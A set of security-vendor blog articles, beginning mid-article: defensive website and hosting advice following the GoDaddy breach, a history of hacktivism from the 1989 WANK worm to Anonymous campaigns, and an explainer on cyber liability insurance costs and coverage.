One of the benefits of cloud hosting is resource distribution, but unfortunately, this can also be a source of vulnerabilities. If not all organizations in the cloud supply chain are as studious as your organization about security, they could leave the entire chain vulnerable.

Insecure APIs

APIs (application user interfaces) are designed to help streamline cloud computing processes, but they can allow attackers to easily infiltrate your cloud infrastructure if they aren’t secured properly. 

Reusable components are incredibly popular, which can make it difficult to safeguard your organization against this type of attack. In an attempt to gain unauthorized access, an attacker can simply try basic access attempts repeatedly until they find a single vulnerability that allows them into the system.

Steps You Can Take to Protect Your Organization & Your Website

In the modern era, it is an unfortunate truth that it isn’t so much if your organization will experience a cybersecurity incident, but when. Luckily, there are steps you can take to safeguard your website and your organization as a whole. 

Website Best Practices For Static Sites 

One of the best things you can do to safeguard your website is to make sure you are following website security best practices

If you have a static site, you should ensure that you have an SSL certificate and keep your software up to date. You should also keep an eye on your website using uptime monitoring programs so that you are altered any time your site undergoes an unexpected content change. 

By keeping an eye on your website, you can quickly learn if an incident has occurred, allowing you to mitigate or even prevent damage if your website is defaced or otherwise compromised.

For WordPress or Other Database Websites (Like Those Impacted by the GoDaddy Attack)

There are a few things you can do to better safeguard your WordPress website. This includes implementing a robust username and password policy and adding multi-factor authentication. If you need to store passwords on your website for any reason, you should ensure that all passwords are encrypted, and you may want to consider using OAuth or another third-party identity management site.  

You should also consider implementing rate limiting or limiting user logins based on the number of failed login attempts. This can help safeguard your website from brute-force attacks. You should also strongly consider changing your admin username from the default “Admin” to something harder to guess.

Rate limiting can help safeguard your website from botnets involved in brute force attacks. Rate limiting allows users almost unlimited login attempts but artificially installs a delay between each attempt. Even a seemingly insignificant delay of a second or two can slow down a brute force attack, buying your organization more time for someone to notice something is amiss and take appropriate action. 

You should also seriously consider changing your login path from the default URL. WordPress is the most commonly used content management system on Earth, and many WordPress websites continue to use the /wp-admin/ login path. As such, attackers may use this knowledge to quickly locate and access your login page. By making the login page harder to find, you can help dissuade attackers or at least buy your team more time to respond.

Interview Your Hosting Provider & Review Your SLA Carefully

The GoDaddy security incident has demonstrated how much a website’s security depends on the security of its hosting provider. Though life, and cybersecurity, in particular, offer no guarantees, here are a few questions you should ask your hosting provider in light of this recent attack.

  1. Ask your hosting provider how they monitor their network. Suspicious activities can’t be stopped if they aren’t detected, so you want to make sure your hosting provider is carefully monitoring their internal network by asking them how their network is monitored, who is responsible for monitoring, and what sort of red flags they are actively looking for.
  2. Ask about their antivirus and malware scanning and removal processes. Malware continues to be a threat, so you need to know what sort of malware protection your host offers and what steps they take to secure your website. You should also ask if their support team is scanning your account and request a copy of these internal reports. You also need to be clear on what will happen if your account is infected and what steps your hosting provider will take to help you identify and remove malware on your website.
  3. Don’t forget SSL, firewalls, and DDoS prevention. You should also ask your provider what sort of protocols they have in place to prevent cyberattacks like the one experienced by GoDaddy. You should also find out if your hosting provider offers SSL certificates or if that is something your team will need to handle. Most providers don’t handle SSL certificate implementation, but they do need to provide you with the certificate so your team can implement it. 

You should be able to find at least some of this information in your SLA (service level agreement), but if the answers to any of these questions are missing, you should reach out to your contact at your hosting provider for more information.

You should also lock down your folders and subdirectories to make it more difficult for unauthorized users to access exploits or vulnerabilities associated with back-end software and upload files containing malware. You should also consider adding bot filters and maintaining an active blacklist to help you filter out bots and prevent brute-force attacks. 

Create an Incident Response Plan & Invest in Cybersecurity Training for All Employees

When it comes to cybersecurity, it is always best to be proactive instead of reactive. A robust incident response plan in place will allow you to respond to attacks quickly and effectively while helping limit damage and make your recovery smoother.

For more information, please consider reading our educational guide on creating an effective incident response plan

Beware of Possible Phishing Scams

In their statement, GoDaddy specified that customers whose email addresses were exposed are now more likely than ever to be targeted by phishing attacks. However, all organizations should ensure their employees know what sort of red flags to look for when it comes to phishing scams. To help improve your employee cybersecurity training and educate your team, please consider reviewing our educational article Don’t Let Phishing Scams Catch You Unaware.

Whether your organization has been directly impacted by the GoDaddy security incident or not, now is an excellent time to review your website’s cybersecurity best practices. For more information, or to start improving your cybersecurity stance, please contact our team today.

The Growing Trend of “Hacktivism”, & What it Means for Businesses

The Growing Trend of “Hacktivism”, & What it Means for Businesses

Last updated August 19, 2022

Summary:

  • “Hacktivism” occurs when activists digitally disrupt the systems or operations of a given organization—often to further political goals rather than specifically to cause injury or financial loss.
  • While certain examples of hacktivism (such as the participation of Wikileaks and Anonymous in Arab Spring) have garnered broad public support, they can also endanger innocents by exposing them to cybersecurity threats.
  • The anonymity of hacktivism allows its perpetrators to operate with impunity and eliminate their accountability—even to those they claim to be helping.
  • High-profile hacktivism incidents date back to the late 1980s and continue today, often costing millions of dollars for organizations and exposing the personal information of their customers. As such, it’s vital for organizations to invest in robust cybersecurity solutions.

When most people think of a hacker, they think of a loner hiding in a dark basement, destroying computer systems and other digital resources for personal financial gain, or a sophisticated computer whiz employed by a foreign government up to no good. 

However, in recent years, a growing number of hackers have been putting their skills to use for a different reason: activism. This trend, dubbed “hacktivism”, is on the rise and can have serious consequences for businesses of all sizes in all verticals and industries. 

See also:

computer with hacktivism on the front screen

What is Hacktivism?

Information security researcher Dorothy Denning defines hacktivism as “the marriage of hacking and activism”, more specifically, using computers to achieve a political agenda through legally ambiguous means. As a general rule, hacktivism aims to obstruct normal computer and business activities in some way but, unlike other forms of hacking, does not necessarily aim to cause permanent injury or significant financial loss and is rarely motivated by financial gain. 

Hacktivism Can Be a Force for Good….

When most readers think of hacktivism, they think of large-scale political movements and revolutions such as the Arab Spring, which depended at least in part on technology and hacktivism. 

In 2011, when young protesters took to the streets in cities across the Middle East to rally against oppressive governments, some who had held power for decades, they were emboldened and assisted by technology. In the eyes of some, WikiLeaks and Anonymous played a key role in creating the social conditions that allowed the Arab Spring to happen by posting damning secret government documents online before the protests began. 

A specific example of this hacktivism was the uprising in Tunisia, which was initially largely ignored by the foreign media. When members of Anonymous realized the significance of the uprising, they partnered with Tunisian dissidents to help them share videos of what was really going on on the ground with the outside world. They also created a “care packet” (available in English, Arabic, and French) that offered dissidents advice on how to conceal their identities on the internet to avoid detection by the former Tunisian regime’s cyberpolice.

Though most believe the Arab Spring to be a positive and necessary step, the hacktivism that accompanied it, particularly the act of disclosing confidential documents and personnel files indiscriminately, could endanger lives. Anonymous and similar hacktivist organizations do not always carefully vet what information they release, which could inadvertently expose innocent individuals to cybersecurity threats.

… But it Frequently Harms Innocent Organizations & Individuals

The goal of most hacktivists is to draw attention to a particular cause using virtual political activism. This can be a noble goal, as demonstrated during the Tunisian uprising, but not all hacktivists are so altruistic. Unfortunately, many hacktivists are also not particularly concerned about avoiding collateral damage while carrying out their activist activities, and innocent parties can be caught in the crossfire. 

For example, while protesting the recent police actions on the Bay Area Rapid Transit (BART) system in San Francisco, a hacktivist posted the full names, addresses, and cell phone numbers of cover 2000 MyBART subscribers (ordinary transit users) online, increasing their chances of being targeted by identity thieves and other criminals. 

In a recent article by PC World, a former member of Anonymous called “SparkyBlaze” admitted that he was “fed up with [Anonymous] putting people’s data online and then claiming to be the big heroes.” He also stated that “Getting files and giving them to WikiLeaks, that sort of thing does hurt governments. But putting user names and passwords on a Pastebin doesn’t [affect governments], and posting the info of the people you fight for is just wrong.”

While some hacktivist organizations, like other activist organizations, might be doing real good, too many are using the guise of activism to cause significant harm to innocent organizations and individuals. 

As one article published in the Journal of Human Rights Practice puts it, unlike more familiar forms of activism, hacktivism can often be anonymous, allowing it to operate with a kind of impunity afforded by technology. As such, hacktivists are accountable to no one, not even organizations, groups, and individuals they aim to help, which is deeply problematic

Many hacktivist organizations, including Anonymous and WikiLeaks, engage in highly questionable activities, which they are able to do because of the anonymous nature of hacktivism. Since there is no way to hold individuals accountable, they are incredibly dangerous, both for the problematic organizations and governments they target and for the rest of us. 

large crowd protesting

A Brief History of Hacktivism: Six Infamous Events

While hacking has been around since the 1950s, hacktivism as a concept didn’t really emerge until 1989, when the first “hacktivist” action (referred to as Worms Against Nuclear Killers) took place. 

Worms Against Nuclear Killers (1989)

The 1989 attack, which many believe to be the work of Melbourne-based hackers “Electron” and “Pheonix”, used a malware worm to infiltrate computers at both NASA and the US Energy Department. The worm altered the login screen of infected computers to display the message ”Worms Against Nuclear Killers” and was fueled by rising anti-nuclear sentiment. A second worm, called OILZ, was also deployed and contained bugs designed to prevent access to accounts and files by changing passwords. The goal of this attack was to attempt to shut down the DECnet computer network in the days before a NASA launch, causing disruption and costing roughly half a million dollars in damages and lost time.

Hacktivism has only grown in both scope and influence. Other influential campaigns include:

Hacktivismo Declaration (2001)

Hactivismo, an offshoot of the hacker group Cult of the Dead Cow (cDc), emerged when they released their declaration that aimed to elevate freedom of speech. During this event, the group explicitly attempted to both engage in civil disobedience and explain their reasoning behind their actions. 

The declaration released by Hactivismo cited two United Nations’ documents: the International Covenant on Civil and Political Rights and the Universal Declaration of Human Rights, and included an FAQ that stated that the main purpose of their actions was to “cite some internationally recognized documents that equate access of information with human and political rights”.

As a result of their declaration, this group aimed to create both moral and legal grounds for future hacktivists to launch their campaigns. The group went on to release a web browser, called Peekabooty, that prevents censorship from nation-sates that deny or restrict internet access. 

Project Chanology (2008)

When a video of actor Tom Cruise voicing his affiliation with the Church of Scientology appeared on YouTube, the church forced the video hosting platform to remove it. In response to the censorship, Anonymous launched a DDoS (Distributed Denial of Service) attack against the Church of Scientology website, which was also defaced. A series of prank calls and black faxes followed the DDoS attack, and Anonymous also distributed private church documents stolen from Scientology computers during a doxxing attack

The hacktivist actions were also paired with in-person protests across the country where protesters donned the now infamous Guy Fawks masks associated with Anonymous

US Executive Branch Attack (2013)

Presumably believed to be associated with Syrian President Bashar al-Assad, the Syrian Electronic Army (SEA) has carried out a number of attacks using both spear-phishing and DDoS attacks designed to compromise and deface government, media, and privately-held organizational websites. 

The group successfully released a fake tweet claiming that an explosion at the White House had injured the President. After the tweet went live, the Dow briefly plunged 140 points. In 2016, the FBI charged two SEA-affiliated individuals with the attack.

Clinton Emails Leak (2016)

This attack, a joint venture between WikiLeaks and Russia’s foreign military intelligence directorate Glavnoye Razvedyvatel’noye Upravleniye (GRU), focused on emails between then-presidential candidate Hilary Clinton and her campaign manager. The emails were illegally obtained by GRU and released by WikiLeaks, and the goal was to discredit Ms. Clinton in order to further the campaign of her opponent Donald Trump.

Hackers used spear-phishing emails to steal credentials from DNC members and gain unauthorized access to the emails. The campaign significantly impacted the Clinton campaign and may have contributed to her loss. Following the leak, the US Department of Justice indicted 12 Russian hackers for the incident.

Black Lives Matter Movement (2020)

While the BLM (Black Lives Matter) movement reaches beyond the realm of hacktivism, the group Anonymous did throw their weight behind this movement protesting police corruption following the death of George Floyd. The group had also voiced similar condemnations in the past following the murders of Michael Brown and 12-year-old Tamir Rice.

In support of the social-justice-focused BLM movement, Anonymous released a video on Twitter that specifically criticized the Minneapolis police department in the wake of the shooting. As a result of the video, Anonymous’ Twitter account gained 3.5 million new followers in the following days, and the campaign has been linked to a series of DDoS attacks that briefly shut down the Minneapolis police department website, its parent website, and the Buffalo, New York government website over the course of a single weekend.

How Hacktivism Harms Businesses

While some hacktivist activities, such as creating open-source software that allows people in China to circumvent government censorship, are arguably good, we have seen that hacktivism also has a dark side. 

Hackers of all stripes, including some hacktivists, often use open-source hacking tools to penetrate networks with the goal of paralyzing or destroying legitimate businesses. This can be done for a variety of reasons, including retaliatory action in the case of George Hotz.

Sony vs Hotz

In 2010, then-teenage researcher George Hotz (now President at comma.ai) was able to reverse-engineer the Sony private key and published it online. This allowed almost anyone with an internet connection to rewrite Sony’s firmware and classify themselves as a developer on the Sony network, gaining free access to all of Sony’s online games. This action adheres to the philosophy that many hacktivists and other hackers share, which deems that all information, even proprietary information, should be free. 

In response to his actions, Sony sued Hotz, which attracted the attention of hacktivists. The company was targeted by several DDoS attacks and a data breach, which exposed the credit card numbers of 12 million innocent customers, as well as 75,000 “music codes” and 3.5 million “music coupons”, resulting in massive financial losses for the company. All and all, Sony estimates they lost about $173 million, including the cost of increased customer support, incentives to woo customers back, legal costs, loss of sales, and the costs to improve their cybersecurity systems. 

Ultimately, regardless of the goal of the hacktivist organization, gaining unauthorized access to a company’s network or other digital assets is wrong, and companies need to take steps to ensure their cybersecurity posture is robust enough to thwart attacks and avoid or at least minimize damage. 

Is your organization prepared? For more information, or to start crafting your incident response plan, please contact our team today.

What is Cybersecurity Insurance (& Does Your Business Need It?)

What is Cybersecurity Insurance (& Does Your Business Need It?)

An unfortunate reality of the modern, connected business world is that it is no longer a question of if your organization will experience a cybersecurity incident, but when. In 2020, there was one new ransomware victim every ten seconds, while the average cost of a data breach the same year was $3.86 million.

Those eye-watering numbers have many organizations of all sizes and in all verticals, justifiably concerned. Improving your cybersecurity posture and ensuring you have an effective incident response plan in place can significantly reduce the amount of downtime your organization experiences should an incident occur, as well as minimize or even eliminate damages. However, to help offset the costs associated with cybersecurity incident recovery, more organizations than ever before are turning to cybersecurity insurance.

man calculating cost or cybersecurity risks and breaches

What is Cybersecurity Insurance?

Cybersecurity insurance (also called cyber liability insurance) is designed to cover the costs associated with cybercrime should your technological systems or customer data be targeted as part of a cybersecurity incident. While your exact coverage will vary depending on your insurance provider and other factors, cyber liability insurance typically covers legal costs and damages such as:

Cyber Liability Insurance vs Cybercrime Insurance: What is the Difference?

Some insurance providers also offer cybercrime insurance in addition to cyber liability insurance. This additional insurance is designed to help compensate your organization for funds lost during a cybersecurity incident such as a hack or social engineering attack, including notification costs, data restoration costs, and associated legal expenses.

What Typically Isn’t Covered

Like all forms of insurance, there are a few things cyber liability insurance typically doesn’t cover. While what is and is not covered will vary depending on your insurance provider and policy, typical exclusions include:

  • Potential future lost profits
  • Loss of value due to intellectual property theft
  • Betterment, which is the cost to improve your internal technology systems, including software or security upgrades, after an attack has occurred

Common Types of Cyber Liability Claims

When it comes to insurance claims, most cyberattacks fall into one of three categories: hacking, social engineering, and malware (including ransomware).

Hacking

Hacking (gaining unauthorized access to a computer system, usually by exploiting existing security vulnerabilities) is the most common type of attack that leads to an insurance claim. This is because if an attacker compromises your system or network, your company could be liable for a wide variety of costs related to the attack, including:

  • Third-party lawsuits
  • The costs associated with notifying affected parties and other stakeholders
  • Public relations and reputation management costs
  • Regulatory fines

Social Engineering

Social engineering attacks (including phishing scams) depend on an attacker tricking someone inside your company into helping them. Attackers trick unknowing individuals with access to your system into essentially opening the door for them, usually by impersonating a trusted individual (such as their boss or another superior or someone from accounting or the bank) and asking them to click a link, hand over their login credentials, or grant access to restricted areas of the network. The employee then unwittingly either lets the attacker into the network or downloads malware, which grants access or otherwise allows the attacker to wreak havoc.

Malware

Malware, short for malicious software, comes in a variety of forms and is an incredibly common type of cyberattack. Malware can be difficult to defend against because every program is different and uses different strategies to infiltrate your network. Ransomware is a very common form of malware designed to hijack your system and lock you and your employees out of the network. The attacker then demands a ransom in exchange for releasing or unlocking the system. However, not all attackers follow through on their end and may simply take the ransom money and leave the network locked.

photo of hooded man hacking with his computer

First-Party vs Third-Party Insurance

What type of cyber liability insurance your organization decides to purchase should be based on a variety of factors, including your needs as an organization and what entities you need to protect. Unfortunately, when it comes to cyberattacks, the business originally targeted is not the only party that may be impacted. As such, there are two different types of cyber liability insurance: first-party and third-party.

First-party insurance protects your company or organization and will cover the costs outlined in your policy associated with an attack. Any organization that handles electronic data should purchase a first-party policy to cover the various expenses that organizations face in the wake of a cybersecurity incident.

Third-party insurance is designed to protect organizations that offer professional services to other businesses that could be impacted in the event of an attack. This type of coverage is often compared to professional liability insurance in the sense that the third-party insurance can help safeguard your business in the event you are sued by another organization for errors you may have made that resulted in damages or losses to the company suing you.

For example, let’s say your organization is a law firm. Your law firm’s data security is compromised, and as a result, several of your clients have accused you of failing to prevent the data breach. In this instance, the third-party cyber-liability insurance would cover your legal fees, government penalties and fines, and any settlements or judgments related to these claims.

What is the Average Cost of Cybersecurity Insurance?

How much your cyber liability insurance plan costs will depend on a variety of factors, including the type of business you run and the level of cyber risk you are exposed to. However, a recent study by AdvisorSmith Solution Inc found that the average cost of a cyber liability policy in 2019 was $1500 per year for $1 million in coverage, as well as a $10,000 deductible.

How much your policy costs will also depend on:

  1. Your size and industry: The more employees you have, the greater your chances of falling for a successful phishing or other social engineering attack, which will drive up your insurance premiums. However, a larger factor is your industry. Different industries are classified as low, medium, or high risk, depending on the type and amount of data your organization stores.
  1. How much data you store, and how sensitive it is: Low-risk organizations, such as small local businesses with limited customer bases, will pay less for their coverage than higher-risk organizations such as retail stores that collect and store customer credit card numbers both instore and online through their website or eCommerce store. Organizations that store large amounts of highly sensitive personal data (such as social security numbers or dates of birth), such as hospitals or other healthcare facilities, will pay higher premiums.
  1. Your annual revenue: In the eyes of most insurance companies, the more money your business makes, the more likely a cybercriminal will target your organization. As such, organizations with higher revenue streams are more likely to pay higher premiums for cyber liability insurance.
  1. How robust your cybersecurity posture is: Most insurance companies reward organizations that take cybersecurity seriously and dedicate significant resources and people hours to safeguarding their digital assets. To help keep your insurance costs low, all organizations (particularly high-risk ones) should invest in robust cybersecurity measures, have sufficient security measures in place, and ensure their employees receive appropriate cybersecurity training.
  1. The terms of your policy: Your coverage limits and deductible also play a significant role in determining your insurance premiums. The more coverage you want, the higher your monthly insurance premiums will be. Your deductible refers to the amount of loss your business is responsible for in the event of an incident that is covered by your policy. Organizations that opt for a higher deductible (absorbing more of the initial costs themselves) typically pay lower premiums but are on the hook for more of the damages in the event of an incident. On the other hand, organizations that opt for a lower deductible will pay higher monthly premiums but will have more of their losses covered in the event of an incident. Organizations with robust security measures in place may opt for lower premiums and a higher deductible, while high-risk organizations that store lots of sensitive data may opt for higher premiums in exchange for a lower deductible.

Does My Business Need Cybersecurity Insurance?

If your organization handles electronic data, you should have at least a basic cyber liability insurance plan in place. Like all forms of insurance, cyber liability insurance is there to cover worst-case, what-if scenarios.

Handing over funds for cyber liability insurance every month may seem like an unnecessary expense, but a large-scale cybersecurity incident can be enough to bankrupt a small or even medium-sized organization and destroy your reputation. Having access to emergency funds to defray costs such as hiring an expert team to help you fend off an attack in progress and limit damages, replacing damaged equipment, paying fines, covering your legal costs, and managing your reputation after an incident could be the difference between your organization weathering the storm relatively unscathed or folding under the pressure.

Take a Proactive Approach

Investing in a robust yet flexible cybersecurity posture will do more than just help keep your premiums low; it can also help your organization fend off attacks in real-time and limit or even eliminate permanent damage to your infrastructure.

Investments such as employee cybersecurity training (both as ongoing training and part of your employee onboarding process) can also help safeguard your organization by giving your team the tools they need to spot suspicious activities (such as phishing scams) and sound the alarm before any damage can be done.

Selecting the Best Insurance Provider for Your Organization

With cybercrime on the rise, more insurance companies than ever are offering cyber liability insurance. As with any insurance policy, it often pays to shop around. Start by finding out if your existing insurance provider offers cyber liability insurance. If they do, you might be able to negotiate a break on your premiums or a better deductible in light of your existing relationship.

However, it also helps to shop around and see what other providers and policies are available. Since the cost of your insurance plan is typically determined in part by your industry or vertical, it can help to reach out to other organizations like yours for recommendations and advice. You may also want to consider consulting with your MSSP (Managed Security Services Provider) to see if they have any recommendations. MSSPs have extensive cybersecurity experience and work with a variety of organizations, so they may be able to help you determine what sort of policy is best for your organization’s unique needs.

For more information about the importance of cyber liability insurance, and cybersecurity in general, please contact our team today.